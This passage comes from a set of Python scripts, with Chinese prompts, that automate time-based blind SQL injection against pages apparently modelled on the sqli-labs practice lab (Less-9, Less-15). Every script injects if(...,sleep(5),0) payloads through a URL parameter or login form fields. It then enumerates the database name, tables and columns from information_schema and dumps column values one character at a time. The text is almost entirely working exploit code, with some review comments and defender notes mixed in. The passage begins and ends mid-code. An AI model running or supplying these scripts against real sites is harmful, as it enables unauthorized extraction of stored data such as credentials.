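    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for number, name in enumerate(DBTables, 1):
        print("(" + str(number) + ")" + name)
    if not DBTables:
        print("[!]未获取到任何表,结束")
        return
    tableIndex = ask("[*]请输入要查看表的序号:", 1, len(DBTables)) - 1
    GetDBColumns(url, DBName, DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for number, name in enumerate(DBColumns, 1):
            print("(" + str(number) + ")" + name)
        columnIndex = ask("[*]请输入要查看字段的序号(输入0退出):", 0, len(DBColumns)) - 1
        if columnIndex == -1:
            break
        GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])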

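if __name__ == "__main__":
    usage = "./BlindBool_post.py -u url"
    parser = OptionParser(usage)
    parser.add_option('-u', type='string', dest='url', default='http://localhost/Less-15', help='设置目标url')
    options, args = parser.parse_args()
    # Run the scan in the main thread.  The original started it in a worker
    # thread: Ctrl-C is delivered to the main thread, which had already left
    # the try block after start(), so the handler never ran and the
    # non-daemon worker kept going; input() also ran off the main thread.
    try:
        StartSqli(options.url)
    except KeyboardInterrupt:
        print('Interrupted by keyboard inputting!!!')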

BlindTime_get

#!/usr/bin/python3
# -*- coding: utf-8 -*-

import requests
from optparse import OptionParser
import time
import threading


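# Scan results live in module globals so StartSqli can present them.
DBName = ""       # current database name, filled in by GetDBName
DBTables = []     # table names of DBName, filled in by GetDBTables
DBColumns = []    # column names of the chosen table, filled in by GetDBColumns
DBData = {}       # column name -> list of dumped values, filled in by GetDBData

# One session for the whole scan.  The original assigned
# requests.adapters.DEFAULT_RETRIES and conn.keep_alive; neither has any
# effect (HTTPAdapter binds its retry default when __init__ is defined, and
# Session has no keep_alive attribute), so "Max retries exceeded with url"
# was not actually mitigated.  Mounting an adapter with max_retries and
# sending Connection: close does the intended thing.  Note for a time-based
# oracle: a retried request inflates the measured round trip, which only
# ever pushes a probe towards "true"; keep the per-request timeout above
# the injected sleep so a genuine delay is measured, not retried.
conn = requests.Session()
_adapter = requests.adapters.HTTPAdapter(max_retries=5)
conn.mount('http://', _adapter)
conn.mount('https://', _adapter)
conn.headers['Connection'] = 'close'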


# 盲注主函数
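def StartSqli(url):
    """Interactive driver: database name -> tables -> columns -> column dump.

    Prompts on stdin for the table to inspect and then, repeatedly, for the
    column to dump (0 exits).  Works on the module-level result globals.

    Robustness over the original: a non-numeric or out-of-range answer is
    re-prompted instead of raising ValueError / IndexError, and 0 or a
    negative number at the table prompt no longer silently selects the last
    entry through negative indexing.
    """
    def ask(prompt, lowest, highest):
        # Re-prompt until the answer is an integer within [lowest, highest].
        while True:
            raw = input(prompt).strip()
            if raw.isdigit() and lowest <= int(raw) <= highest:
                return int(raw)
            print("[!]请输入{0}到{1}之间的整数".format(lowest, highest))

    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for number, name in enumerate(DBTables, 1):
        print("(" + str(number) + ")" + name)
    if not DBTables:
        print("[!]未获取到任何表,结束")
        return
    tableIndex = ask("[*]请输入要查看表的序号:", 1, len(DBTables)) - 1
    GetDBColumns(url, DBName, DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for number, name in enumerate(DBColumns, 1):
            print("(" + str(number) + ")" + name)
        columnIndex = ask("[*]请输入要查看字段的序号(输入0退出):", 0, len(DBColumns)) - 1
        if columnIndex == -1:
            break
        GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])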


# 获取数据库名函数
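def GetDBName(url):
    """Recover the current database name with time-based blind injection.

    A probe counts as "true" when the round trip takes at least 5 s, i.e.
    the injected ``sleep(5)`` branch ran.  The name accumulates into the
    module-level ``DBName``.

    Args:
        url: target URL ending in the injectable parameter value.

    Notes:
        A slow or jittery link can push a "false" response past 5 s and
        yield a false positive; this script does not re-check.  Timing uses
        ``time.monotonic()`` so a clock adjustment cannot fake a delay.

    Raises:
        RuntimeError: if no length in 1..98 produces the delay (wrong
            injection point or a filtered payload).  The original silently
            continued with a bogus length of 98.
    """
    global DBName

    def delayed(target):
        # The per-request timeout must stay well above sleep(5), otherwise a
        # true branch raises a Timeout instead of being measured.
        started = time.monotonic()
        conn.get(target, timeout=20)
        return time.monotonic() - started >= 5

    print("[-]开始获取数据库名长度")
    length_url = url + "' and if(length(database())={0},sleep(5),0) --+"
    for DBNameLen in range(1, 99):
        if delayed(length_url.format(DBNameLen)):
            print("[+]数据库名长度:" + str(DBNameLen))
            break
    else:
        raise RuntimeError("database name length not found: check url / payload")

    print("[-]开始获取数据库名")
    char_url = url + "' and if(ascii(substr(database(),{0},1))={1},sleep(5),0)--+"
    for pos in range(1, DBNameLen + 1):
        for code in range(33, 128):
            if delayed(char_url.format(pos, code)):
                DBName += chr(code)
                break
        else:
            # No printable-ASCII match; keep a placeholder so positions align.
            DBName += "?"
            print("[!]第{0}位未匹配到可打印字符".format(pos))
        print("[-]" + DBName)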


#获取数据库表函数
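def GetDBTables(url, dbname):
    """Enumerate the table names of schema ``dbname`` into ``DBTables``.

    Time-based oracle: a probe is "true" when the round trip is >= 5 s.
    Stages: table count, then per index the name length, then each
    character.

    Args:
        url: target URL ending in the injectable parameter value.
        dbname: schema to enumerate; spliced inside single quotes.

    Raises:
        RuntimeError: if the table count or a name length never produces
            the delay (the original went on with 98).
    """
    global DBTables

    def delayed(target):
        started = time.monotonic()
        conn.get(target, timeout=20)  # must exceed the injected sleep(5)
        return time.monotonic() - started >= 5

    print("[-]开始获取{0}数据库表数量:".format(dbname))
    count_url = url + "' and if((select count(table_name) from information_schema.tables where table_schema='{0}' )={1},sleep(5),0) --+"
    # Start at 0 so an empty schema is recognised instead of failing.
    for DBTableCount in range(0, 99):
        if delayed(count_url.format(dbname, DBTableCount)):
            print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))
            break
    else:
        raise RuntimeError("table count of {0} not found: check url / payload".format(dbname))

    print("[-]开始获取{0}数据库的表".format(dbname))
    len_url = url + "' and if((select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},sleep(5),0) --+"
    char_url = url + "' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},sleep(5),0)--+"
    for idx in range(DBTableCount):
        print("[-]正在获取第{0}个表名".format(idx + 1))
        for tableLen in range(1, 99):
            if delayed(len_url.format(dbname, idx, tableLen)):
                break
        else:
            raise RuntimeError("length of table #{0} not found".format(idx + 1))
        table = ""
        for pos in range(1, tableLen + 1):
            for code in range(33, 128):
                if delayed(char_url.format(dbname, idx, pos, code)):
                    table += chr(code)
                    print(table)
                    break
            else:
                table += "?"  # no printable-ASCII match; keep positions aligned
        DBTables.append(table)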


# 获取数据库表的字段函数
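def GetDBColumns(url, dbname, dbtable):
    """Enumerate the column names of ``dbname.dbtable`` into ``DBColumns``.

    Time-based oracle (round trip >= 5 s means "true").  Stages: column
    count, then per column its name length and each character.

    Args:
        url: target URL ending in the injectable parameter value.
        dbname: schema name, spliced inside single quotes.
        dbtable: table name, spliced inside single quotes.

    Raises:
        RuntimeError: if the column count or a name length never produces
            the delay (the original went on with 98).
    """
    global DBColumns

    def delayed(target):
        started = time.monotonic()
        conn.get(target, timeout=20)  # must exceed the injected sleep(5)
        return time.monotonic() - started >= 5

    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    count_url = url + "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},sleep(5),0) --+"
    for DBColumnCount in range(99):
        if delayed(count_url.format(dbname, dbtable, DBColumnCount)):
            print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))
            break
    else:
        raise RuntimeError("column count of {0}.{1} not found".format(dbname, dbtable))

    len_url = url + "' and if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},sleep(5),0) --+"
    char_url = url + "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},sleep(5),0) --+"
    for idx in range(DBColumnCount):
        print("[-]正在获取第{0}个字段名".format(idx + 1))
        for columnLen in range(99):
            if delayed(len_url.format(dbname, dbtable, idx, columnLen)):
                break
        else:
            raise RuntimeError("length of column #{0} not found".format(idx + 1))
        column = ""
        for pos in range(1, columnLen + 1):  # substr() positions are 1-based
            for code in range(33, 128):
                if delayed(char_url.format(dbname, dbtable, idx, pos, code)):
                    column += chr(code)
                    print(column)
                    break
            else:
                column += "?"
        DBColumns.append(column)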


# 获取表数据函数
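def GetDBData(url, dbtable, dbcolumn):
    """Dump every value of ``dbtable.dbcolumn`` into ``DBData[dbcolumn]``.

    Time-based oracle (round trip >= 5 s means "true").  Row count via
    ``count(column)``, then per row the value length and each character.

    Args:
        url: target URL ending in the injectable parameter value.
        dbtable: table to read; spliced unquoted into the FROM clause.
        dbcolumn: column to read; spliced unquoted into the SELECT list.

    Notes:
        ``count(col)`` skips NULLs while ``limit n,1`` does not, so a NULL
        row never gets a confirmed length; it is stored as "" with a warning
        instead of burning 98 x 95 five-second probes.  Characters are
        searched in 32..127 so spaces inside values are recovered.

    Raises:
        RuntimeError: if the row count never produces the delay.
    """
    global DBData

    def delayed(target):
        started = time.monotonic()
        conn.get(target, timeout=20)  # must exceed the injected sleep(5)
        return time.monotonic() - started >= 5

    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    count_url = url + "' and if((select count({0}) from {1})={2},sleep(5),0) --+"
    for DBDataCount in range(99):
        if delayed(count_url.format(dbcolumn, dbtable, DBDataCount)):
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
            break
    else:
        raise RuntimeError("row count of {0}.{1} not found".format(dbtable, dbcolumn))

    len_url = url + "'and  if((select length({0}) from {1} limit {2},1)={3},sleep(5),0) --+"
    char_url = url + "' and  if(ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},sleep(5),0) --+"
    for row in range(DBDataCount):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, row + 1))
        for dataLen in range(99):
            if delayed(len_url.format(dbcolumn, dbtable, row, dataLen)):
                print("[-]第{0}个数据长度为:{1}".format(row + 1, dataLen))
                break
        else:
            print("[!]第{0}个数据长度未确认(可能为NULL或超过98),按空值处理".format(row + 1))
            dataLen = 0
        data = ""
        for pos in range(1, dataLen + 1):
            for code in range(32, 128):
                if delayed(char_url.format(dbcolumn, dbtable, row, pos, code)):
                    data += chr(code)
                    print(data)
                    break
            else:
                data += "?"  # non-ASCII or filtered; keep positions aligned
        DBData.setdefault(dbcolumn, []).append(data)
        print(DBData)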


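if __name__ == '__main__':
    usage = "./BlindTime_get.py -u url"
    parser = OptionParser(usage)
    # Target URL, -u / --url.
    parser.add_option('-u', '--url', dest='url', default='http://localhost/Less-9/?id=1', type='string', help='target URL')
    options, args = parser.parse_args()
    # Run the scan in the main thread.  The original started it in a worker
    # thread: Ctrl-C is delivered to the main thread, which had already left
    # the try block after start(), so the handler never ran and the
    # non-daemon worker kept going; input() also ran off the main thread.
    try:
        StartSqli(options.url)
    except KeyboardInterrupt:
        print("Interrupted by keyboard inputting!!!")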

BlindTime_post

#!/usr/bin/python3
# -*- coding: utf-8 -*-

import requests
from optparse import OptionParser
import time
import threading


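# Scan results live in module globals so StartSqli can present them.
DBName = ""       # current database name, filled in by GetDBName
DBTables = []     # table names of DBName, filled in by GetDBTables
DBColumns = []    # column names of the chosen table, filled in by GetDBColumns
DBData = {}       # column name -> list of dumped values, filled in by GetDBData

# One session for the whole scan.  The original assigned
# requests.adapters.DEFAULT_RETRIES and conn.keep_alive; neither has any
# effect (HTTPAdapter binds its retry default when __init__ is defined, and
# Session has no keep_alive attribute), so "Max retries exceeded with url"
# was not actually mitigated.  Mounting an adapter with max_retries and
# sending Connection: close does the intended thing.  Note for a time-based
# oracle: a retried request inflates the measured round trip, which only
# ever pushes a probe towards "true"; keep the per-request timeout above
# the injected sleep so a genuine delay is measured, not retried.
conn = requests.Session()
_adapter = requests.adapters.HTTPAdapter(max_retries=5)
conn.mount('http://', _adapter)
conn.mount('https://', _adapter)
conn.headers['Connection'] = 'close'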

# 获取数据库名函数
def GetDBName(url):
	"""Recover the name of the current database through a time-based blind probe.

	url: the login form endpoint; every probe is a POST carrying the fields
	     uname / passwd / submit, with the injected expression in ``uname``.
	Side effect: each recovered character is appended to the global DBName.
	Oracle: the payload wraps the condition in if(..., sleep(5), 0) and a
	round trip of 5 s or more is read as "condition true".
	"""
	# Use the global DBName to hold the name of the database the page is using
	global DBName
	print("[-]开始获取数据库名长度")
	# Holds the length of the database name once it has been found
	DBNameLen = 0
	# Step 1: test candidate lengths 1..98, one request each
	for DBNameLen in range(1, 99):
		# Start of the round trip
		timeStart = time.time()
		payload = "admin' and if(length(database())="+str(DBNameLen)+",sleep(5),0) #"
		# Example of a finished probe: "admin' and if(length(database())=8,sleep(5),0) #"
		data = {
			'uname':payload,
			'passwd':'admin',
			'submit':'Submit',
		}
		res = conn.post(url,data=data)
		# End of the round trip
		timeEnd = time.time()
		# Timing oracle.  NOTE(review): network latency adds to the sleep, so a
		# slow link can turn a false branch into a false positive and there is
		# no confirmation request; if nothing matches, the loop leaves DBNameLen
		# at 98 and the character loop below still runs with that length.
		if timeEnd - timeStart >= 5:
			print("[+]数据库名长度:" + str(DBNameLen))
			break
	print("[-]开始获取数据库名")
	# Step 2: a is the 1-based substr() offset into database()
	for a in range(1, DBNameLen+1):
		# b walks printable ASCII 33..127, one request per candidate: a single
		# position costs up to 95 requests and every hit is a 5 s server-side
		# sleep -- that burst of near-identical form posts with uniform delays
		# is what shows up in access logs and WAF telemetry.
		for b in range(33, 128):
			timeStart = time.time()
			payload = "admin' and if(ascii(substr(database(),"+str(a)+",1))="+str(b)+",sleep(5),0)#"
			data = {
				'uname':payload,
				'passwd':'admin',
				'submit':'Submit',
			}
			res = conn.post(url,data)
			timeEnd = time.time()
			if timeEnd - timeStart >= 5:
				DBName += chr(b)
				print("[-]"+ DBName)
				break


#获取数据库表函数
def GetDBTables(url, dbname):
	"""Recover the table names of ``dbname`` through time-based blind probes.

	url:    the login form endpoint (POST with uname / passwd / submit).
	dbname: schema name spliced verbatim into the information_schema query.
	Side effect: every recovered table name is appended to the global DBTables.
	Three probe rounds: table count, then per table its name length, then its
	characters; each probe is one POST and a >= 5 s round trip means "true".
	"""
	global DBTables
	# Holds the number of tables once it has been found
	DBTableCount = 0
	print("[-]开始获取{0}数据库表数量:".format(dbname))
	# Round 1: test candidate counts 1..98 against information_schema.tables.
	# Defender note: queries against information_schema arriving inside a login
	# form field are a strong signal in query logs and WAF rules.
	for DBTableCount in range(1, 99):
		timeStart = time.time()
		payload = "admin' and if((select count(table_name) from information_schema.tables where table_schema='"+dbname+"' )="+str(DBTableCount)+",sleep(5),0) #"
		data = {
			'uname':payload,
			'passwd':'admin',
			'submit':'Submit',
		}
		res = conn.post(url,data=data)
		timeEnd = time.time()
		if timeEnd - timeStart >= 5:
			print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))
			break
	print("[-]开始获取{0}数据库的表".format(dbname))
	# Scratch variable for the length of the table name being worked on
	tableLen = 0
	# a is the 0-based index of the table currently being recovered (LIMIT a,1)
	for a in range(0,DBTableCount):
		print("[-]正在获取第{0}个表名".format(a+1))
		# Round 2: length of the a-th table name, candidates 1..98
		for tableLen in range(1, 99):
			payload = "admin' and if((select length(table_name) from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1)="+str(tableLen)+",sleep(5),0) #"
			timeStart = time.time()
			data = {
				'uname':payload,
				'passwd':'admin',
				'submit':'Submit',
			}
			res = conn.post(url,data=data)
			timeEnd = time.time()
			# NOTE(review): no match leaves tableLen at 98 and the name loop runs anyway
			if timeEnd - timeStart >= 5:
				break
		# Round 3: the characters of the table name
		# Scratch buffer for the name being assembled
		table = ""
		# b is the 1-based position inside the table name being guessed
		for b in range(1, tableLen+1):
			# c walks printable ASCII 33..127, one request per candidate
			for c in range(33, 128):
				timeStart = time.time()
				payload = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0)#"
				data = {
					'uname':payload,
					'passwd':'admin',
					'submit':'Submit',
				}
				res = conn.post(url,data=data)
				timeEnd = time.time()
				if timeEnd - timeStart >= 5:
					table += chr(c)
					print(table)
					break
		# Publish the recovered name through the global list
		DBTables.append(table)
		# Reset the buffer before the next table name
		table = ""


# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
	"""Recover the column names of ``dbtable`` in ``dbname`` via time-based probes.

	url:     the login form endpoint (POST with uname / passwd / submit).
	dbname:  schema name spliced verbatim into the information_schema query.
	dbtable: table name spliced verbatim into the same query.
	Side effect: every recovered column name is appended to the global DBColumns.
	Same three-round structure as GetDBTables (count, length, characters).
	"""
	global DBColumns
	# Holds the number of columns once it has been found
	DBColumnCount = 0
	print("[-]开始获取{0}数据表的字段数:".format(dbtable))
	# Round 1: candidate counts 0..98 (this loop starts at 0, unlike GetDBTables)
	for DBColumnCount in range(99):
		payload = "admin' and if((select count(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"')="+str(DBColumnCount)+",sleep(5),0) #"
		data = {
				'uname':payload,
				'passwd':'admin',
				'submit':'Submit',
			}
		timeStart = time.time()
		res = conn.post(url,data=data)
		timeEnd = time.time()
		if timeEnd - timeStart >= 5:
			print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))
			break
	# Round 2 and 3: name length, then characters, for each column
	# Scratch buffer for the column name being assembled
	column = ""
	# a is the 0-based index of the column currently being recovered (LIMIT a,1)
	for a in range(0, DBColumnCount):
		print("[-]正在获取第{0}个字段名".format(a+1))
		# Length of the a-th column name, candidates 0..98
		for columnLen in range(99):
			payload = "admin' and if((select length(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1)="+str(columnLen)+",sleep(5),0) #"
			data = {
				'uname':payload,
				'passwd':'admin',
				'submit':'Submit',
			}
			timeStart = time.time()
			res = conn.post(url,data=data)
			timeEnd = time.time()
			if timeEnd - timeStart >= 5:
				break
		# b is the 1-based position inside the column name being guessed
		for b in range(1, columnLen+1):
			# c walks printable ASCII 33..127, one request per candidate
			for c in range(33, 128):
				timeStart = time.time()
				# NOTE(review): this payload starts with "' and" whereas every other
				# probe in this script starts with "admin' and"; the two forms are
				# not interchangeable for the form this script targets -- verify.
				payload = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0) #"
				data = {
					'uname':payload,
					'passwd':'admin',
					'submit':'Submit',
				}
				res = conn.post(url,data=data)
				timeEnd = time.time()
				if timeEnd - timeStart >= 5:
					column += chr(c)
					print(column)
					break
		# Publish the recovered name through the global list
		DBColumns.append(column)
		# Reset the buffer before the next column name
		column = ""


# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
	"""Dump the values of one column, row by row, via time-based blind probes.

	url:      the login form endpoint (POST with uname / passwd / submit).
	dbtable:  table name spliced verbatim into the query.
	dbcolumn: column name spliced verbatim into the query.
	Side effect: each recovered value is appended to DBData[dbcolumn]; the
	whole dict is printed after every row.
	"""
	global DBData
	# Round 1: how many rows the column has, candidates 0..98
	DBDataCount = 0
	print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
	for DBDataCount in range(99):
		payload = "admin' and if((select count("+dbcolumn+") from "+dbtable+")="+str(DBDataCount)+",sleep(5),0) #"
		data = {
			'uname':payload,
			'passwd':'admin',
			'submit':'Submit',
		}
		timeStart = time.time()
		res = conn.post(url,data=data)
		timeEnd = time.time()
		if timeEnd - timeStart >= 5:
			print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
			break
	# a is the 0-based row index (LIMIT a,1).
	# NOTE(review): the SELECT has no ORDER BY, so which row LIMIT a,1 returns
	# is up to the server; rows may repeat or be skipped between probes.
	for a in range(0, DBDataCount):
		print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))
		# Round 2: length of this value, candidates 0..98
		dataLen = 0
		for dataLen in range(99):
			payload = "admin'and  if((select length("+dbcolumn+") from "+dbtable+" limit "+str(a)+",1)="+str(dataLen)+",sleep(5),0) #"
			data = {
				'uname':payload,
				'passwd':'admin',
				'submit':'Submit',
			}
			timeStart = time.time()
			res = conn.post(url,data=data)
			timeEnd = time.time()
			if timeEnd - timeStart >= 5:
				print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))
				break
		# Scratch buffer for the value being assembled (data is already the form dict)
		data1 = ""
		# Round 3: the characters of the value
		# b is the 1-based position inside the value being guessed
		for b in range(1, dataLen+1):
			for c in range(33, 128):
				payload = "admin' and  if(ascii(substr((select "+dbcolumn+" from "+dbtable+" limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0) #"
				data = {
					'uname':payload,
					'passwd':'admin',
					'submit':'Submit',
				}
				timeStart = time.time()
				# NOTE(review): this is the only request in the script sent with
				# conn.get (with a data= body); every other probe uses conn.post.
				res = conn.get(url,data=data)
				timeEnd = time.time()
				if timeEnd - timeStart >= 5:
					data1 += chr(c)
					print(data1)
					break
		# Store under the column name; the value is the list of recovered rows
		DBData.setdefault(dbcolumn,[]).append(data1)
		print(DBData)
		# Reset the buffer before the next row
		data1 = ""

# 盲注主函数
def StartSqli(url):
	"""Drive the enumeration steps in order and let the user pick what to dump.

	Enumerates the database name, then its tables, asks for a table index,
	enumerates that table's columns and then keeps asking for a column index
	(0 exits) until the user quits.  Results are read from the module globals
	DBName, DBTables and DBColumns, which the helpers populate.

	url: target URL handed unchanged to every helper.
	"""
	GetDBName(url)
	print("[+]当前数据库名:{0}".format(DBName))
	GetDBTables(url,DBName)
	print("[+]数据库{0}的表如下:".format(DBName))
	for pos, name in enumerate(DBTables, start=1):
		print("(" + str(pos) + ")" + name)
	# Prompts are 1-based for the user; the lists are 0-based.
	tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
	chosenTable = DBTables[tableIndex]
	GetDBColumns(url,DBName,chosenTable)
	while True:
		print("[+]数据表{0}的字段如下:".format(chosenTable))
		for pos, name in enumerate(DBColumns, start=1):
			print("(" + str(pos) + ")" + name)
		columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
		# 0 from the user becomes -1 here and ends the loop.
		if columnIndex == -1:
			break
		GetDBData(url, chosenTable, DBColumns[columnIndex])

if __name__ == '__main__':
	# Entry point: read the target URL from -u/--url and run StartSqli on a worker thread.
	try:
		parser = OptionParser("./BlindTime_get.py -u url")
		parser.add_option(
			'-u', '--url',
			dest='url',
			default='http://localhost/Less-15/',
			type='string',
			help='target URL',
		)
		options, _ = parser.parse_args()
		url = options.url
		# NOTE(review): the except below only covers option parsing and thread
		# start-up; once the worker is running, a Ctrl-C in the main thread is
		# not expected to stop it.
		worker = threading.Thread(target=StartSqli, args=(url,))
		worker.start()
	except KeyboardInterrupt:
		print("Interrupted by keyboard inputting!!!")

修改的地方:

payload
data
添加了time.sleep(0.05)
default
修改时要注意间隔

BlindTime_post-修改过的

#!/usr/bin/python3
# -*- coding: utf-8 -*-

import requests
from optparse import OptionParser
import time
import threading

# Name of the database the target page is currently using (filled in by GetDBName)
DBName = ""
# Table names recovered from that database (filled in by GetDBTables)
DBTables = []
# Column names of the table the user picked (filled in by GetDBColumns)
DBColumns = []
# Dumped values keyed by column name; the value is the list of rows (filled in by GetDBData)
DBData = {}

# Author's intent: raise the retry count and disable keep-alive so the many
# short requests do not run into "Max retries exceeded with url".
# NOTE(review): HTTPAdapter binds DEFAULT_RETRIES as a default argument at import
# time, and requests.Session has no keep_alive attribute, so neither assignment is
# expected to change connection behaviour -- confirm against the installed requests.
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False


# 获取数据库名函数
def GetDBName(url):
    """Recover the name of the current database through a time-based blind probe.

    url: endpoint that accepts a POST form with a single ``id`` field; the
         injected expression is sent bare (no quote or comment prefix).
    Side effect: each recovered character is appended to the global DBName.
    Oracle: if(..., sleep(5), 0) in the payload and a round trip of 5 s or
    more is read as "condition true".  Character probes are paced with a
    50 ms pause before each request.
    """
    # Use the global DBName to hold the name of the database the page is using
    global DBName
    print("[-]开始获取数据库名长度")
    # Holds the length of the database name once it has been found
    DBNameLen = 0
    # Step 1: test candidate lengths 1..98, one request each
    for DBNameLen in range(1, 99):
        # Start of the round trip
        timeStart = time.time()
        payload = "if(length(database())=" + str(DBNameLen) + ",sleep(5),0)"
        # Stale example from the uname-based variant of this script; the payload
        # here has no "admin' and" prefix and no trailing "#".
        data = {
            'id': payload,
        }
        res = conn.post(url, data=data)
        # End of the round trip
        timeEnd = time.time()
        # Timing oracle.  NOTE(review): network latency adds to the sleep, so a
        # slow link can turn a false branch into a false positive and there is
        # no confirmation request; if nothing matches, the loop leaves DBNameLen
        # at 98 and the character loop below still runs with that length.
        if timeEnd - timeStart >= 5:
            print("[+]数据库名长度:" + str(DBNameLen))
            break
    print("[-]开始获取数据库名")
    # Step 2: a is the 1-based substr() offset into database()
    for a in range(1, DBNameLen + 1):
        # b walks printable ASCII 33..127, one request per candidate: a single
        # position costs up to 95 requests and every hit is a 5 s server-side
        # sleep -- the pacing below lowers the rate but the burst of identical
        # posts with uniform delays is still what logs and WAF telemetry show.
        for b in range(33, 128):
            time.sleep(0.05)
            timeStart = time.time()
            payload = "if(ascii(substr(database()," + str(a) + ",1))=" + str(b) + ",sleep(5),0)"
            data = {
                'id': payload,
            }
            res = conn.post(url, data=data)
            timeEnd = time.time()
            if timeEnd - timeStart >= 5:
                DBName += chr(b)
                print("[-]" + DBName)
                break


# 获取数据库表函数
def GetDBTables(url, dbname):
    """Recover the table names of ``dbname`` through time-based blind probes.

    url:    endpoint that accepts a POST form with a single ``id`` field.
    dbname: schema name spliced verbatim into the information_schema query.
    Side effect: every recovered table name is appended to the global DBTables.
    Three probe rounds: table count, then per table its name length, then its
    characters; each probe is one POST preceded by a 50 ms pause, and a
    >= 5 s round trip means "true".
    """
    global DBTables
    # Holds the number of tables once it has been found
    DBTableCount = 0
    print("[-]开始获取{0}数据库表数量:".format(dbname))
    # Round 1: test candidate counts 1..98 against information_schema.tables.
    # Defender note: information_schema queries arriving in a form field are a
    # strong signal in query logs and WAF rules.
    for DBTableCount in range(1, 99):
        time.sleep(0.05)
        timeStart = time.time()
        payload = "if((select count(table_name) from information_schema.tables where table_schema='" + dbname + "' )=" + str(DBTableCount) + ",sleep(5),0)"
        data = {
            'id': payload,
        }
        res = conn.post(url, data=data)
        timeEnd = time.time()
        if timeEnd - timeStart >= 5:
            print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))
            break
    print("[-]开始获取{0}数据库的表".format(dbname))
    # Scratch variable for the length of the table name being worked on
    tableLen = 0
    # a is the 0-based index of the table currently being recovered (LIMIT a,1)
    for a in range(0, DBTableCount):
        print("[-]正在获取第{0}个表名".format(a + 1))
        # Round 2: length of the a-th table name, candidates 1..98
        for tableLen in range(1, 99):
            time.sleep(0.05)
            payload = "if((select length(table_name) from information_schema.tables where table_schema='" + dbname + "' limit " + str(a) + ",1)=" + str(tableLen) + ",sleep(5),0)"
            timeStart = time.time()
            data = {
                'id': payload,
            }
            res = conn.post(url, data=data)
            timeEnd = time.time()
            # NOTE(review): no match leaves tableLen at 98 and the name loop runs anyway
            if timeEnd - timeStart >= 5:
                break
        # Round 3: the characters of the table name
        # Scratch buffer for the name being assembled
        table = ""
        # b is the 1-based position inside the table name being guessed
        for b in range(1, tableLen + 1):
            # c walks printable ASCII 33..127, one request per candidate
            for c in range(33, 128):
                time.sleep(0.05)
                timeStart = time.time()
                payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='" + dbname + "' limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"
                data = {
                    'id': payload,
                }
                res = conn.post(url, data=data)
                timeEnd = time.time()
                if timeEnd - timeStart >= 5:
                    table += chr(c)
                    print(table)
                    break
        # Publish the recovered name through the global list
        DBTables.append(table)
        # Reset the buffer before the next table name
        table = ""


# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
    """Recover the column names of ``dbtable`` in ``dbname`` via time-based probes.

    url:     endpoint that accepts a POST form with a single ``id`` field.
    dbname:  schema name spliced verbatim into the information_schema query.
    dbtable: table name spliced verbatim into the same query.
    Side effect: every recovered column name is appended to the global DBColumns.
    Same three-round structure as GetDBTables (count, length, characters),
    each probe preceded by a 50 ms pause.
    """
    global DBColumns
    # Holds the number of columns once it has been found
    DBColumnCount = 0
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    # Round 1: candidate counts 0..98 (this loop starts at 0, unlike GetDBTables)
    for DBColumnCount in range(99):
        time.sleep(0.05)
        payload = "if((select count(column_name) from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "')=" + str(DBColumnCount) + ",sleep(5),0)"
        data = {
            'id': payload,
        }
        timeStart = time.time()
        res = conn.post(url, data=data)
        timeEnd = time.time()
        if timeEnd - timeStart >= 5:
            print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))
            break
    # Round 2 and 3: name length, then characters, for each column
    # Scratch buffer for the column name being assembled
    column = ""
    # a is the 0-based index of the column currently being recovered (LIMIT a,1)
    for a in range(0, DBColumnCount):
        print("[-]正在获取第{0}个字段名".format(a + 1))
        # Length of the a-th column name, candidates 0..98
        for columnLen in range(99):
            time.sleep(0.05)
